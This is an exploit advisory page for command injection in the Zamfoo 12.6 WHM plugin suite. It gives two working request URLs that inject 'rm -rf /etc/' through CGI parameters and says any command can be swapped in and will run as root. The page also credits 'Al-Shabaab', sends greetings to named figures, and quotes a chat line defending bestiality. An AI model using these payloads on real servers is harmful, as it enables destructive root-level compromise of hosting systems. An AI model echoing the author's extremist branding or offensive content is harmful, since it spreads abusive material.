Zamfoo Multiple Arbitrary Command Executions

2014.05.04

Credit: Al-Shabaab

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 # Title: Zamfoo Multiple Arbitrary Command Executions
# Author: Al-Shabaab
# Vendor Homepage: http://www.zamfoo.com/
# Version: 12.6
# Intro
The ZamFoo software suite is a series of WHM plugin modules (also known as WHM addon modules) catered towards easing
the burden of web hosting providers that sell shared hosting solutions using the Cpanel and WHM hosting platform.
# Exploit Nmero Uno
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
# Exploit Nmero Dos
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf
/etc/|&newip=127.0.0.1&pattern2=
Both of these exploitz will wipe out the /etc/ dir. Replace command with anything. It all runz as root!
# Greetz
Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
# Quote from #Al-Shabaab
<hoodedcoder> Having sex with animals should be legal. I know my cat loves me and I love him; I ask where is the harm?
If it wasn't consensual he would claw me and try to get away!

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zamfoo Multiple Arbitrary Command Executions

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.